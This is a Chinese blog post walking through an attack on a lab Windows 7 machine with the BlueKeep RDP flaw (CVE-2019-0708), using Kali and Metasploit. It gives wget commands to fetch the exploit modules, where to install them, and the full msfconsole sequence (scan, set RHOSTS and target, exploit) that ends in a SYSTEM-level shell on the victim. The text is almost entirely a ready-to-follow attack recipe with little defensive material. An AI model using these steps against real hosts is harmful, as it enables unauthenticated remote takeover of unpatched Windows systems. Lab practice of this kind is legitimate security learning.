欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7

程序员文章站 2022-07-15 11:06:34
...

一、漏洞说明
2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。

目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试已经可以远程代码执行。

二、影响版本
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp

换个说法就是除了win8和win10,几乎所有版本都有此漏洞

三、开始攻击
依旧是我们的老演员:
kali机:192.138.198.134
win7:192.168.198.138

准备工作:

win7
1.关闭win7防火墙
2.开启3389端口(远程桌面连接)
3.静坐,待被日

kali:
1.更新你的msf(如果你的kali版本是2019.4及其以后的,可以跳过这步)

apt-get install metasploit-framework -->更新metasploit

2.下载此漏洞的exp

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

3.将下载的文件添加或替换到相应目录

rdp.rb  - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb -->替换
rdp_scanner.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb -->替换
cve_2019_0708_bluekeep.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb -->替换
cve_2019_0708_bluekeep_rce.rb  - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb -->添加

正式开始
启动msfconsole,搜索0708特征码

msfconsole -->启动msf
search 0708 -->搜索关于0708的所有文件或模块

kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
请看编号0

auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->探测此漏洞模块

我们来使用它探测一下并查看它需要哪些参数

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->使用此模块
show options -->查看所需参数

kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
这里我们发现所有为yes的参数里面只有RHOSTS(主机地址)为空,那么我们来设置一下靶机的主机地址

set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
exploit -->开始攻击

kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
几秒钟后得到了结果
请看倒数第5排:
The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.

懒得翻译,自己百度去,反正大意就是此主机可能受到此漏洞攻击

既然有漏洞了,那我们就开始攻击
请看图1的编号3

exploit/windows/rdp/cve_2019_0708_bluekeep_rce

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce -->使用攻击模块
show options -->查看所需参数
 set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
 set target 2 -->设置受害机器的架构(可选参数0-7)

kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
这里不同以往,需要设置架构参数,小朋友们不要忘了哦
参数设置好以后就可以开始攻击了

exploit -->开始攻击

kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
当出现Command shell session 1 opened时,证明你已经攻击成功了
此时你只需要按下回车便可
我们来查看一下效果
kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
运行whoami,回显系统权限
运行ipconfig,回显192.168.198.138

好的,成功拿下
啧啧,我们可怜的win7

老话常说
有什么不懂的欢迎私信
如果我有哪点没讲清楚的,欢迎评论

相关标签: 笔记